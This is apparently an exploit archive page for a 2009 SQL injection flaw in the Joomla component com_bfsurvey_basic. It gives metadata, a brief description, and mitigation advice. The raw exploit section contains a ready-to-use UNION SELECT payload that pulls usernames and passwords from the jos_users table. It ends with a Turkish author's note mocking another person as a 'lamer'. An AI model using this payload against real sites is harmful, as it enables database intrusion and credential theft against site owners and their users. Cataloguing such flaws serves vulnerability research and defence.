Joomla Component com_bfsurvey_basic SQL Injection Vulnerability

vendor:

N/A

by:

FL0RiX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_bfsurvey_basic SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. The malicious query can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability

[+] Author: FL0RiX

[+] Greez  : Wretch-x And All Friends

[+] HomePage : http://oltan.org


############################################################################################################################

[+] Exploit;

     [+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--


############################################################################################################################
< ---- Note ---- >
F....N;
Sen çok üstün zekaya sahip birisin,
emin olabilirsin, :)
Sql injection ile domain hackleyebilen tek lamersin, :)
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördügüm En hIyar Lamersin :D
Bu Kafiyelerde Bi TarafIna Girsin ;)
Lol F....N :)
< ---- Note Finished ---- >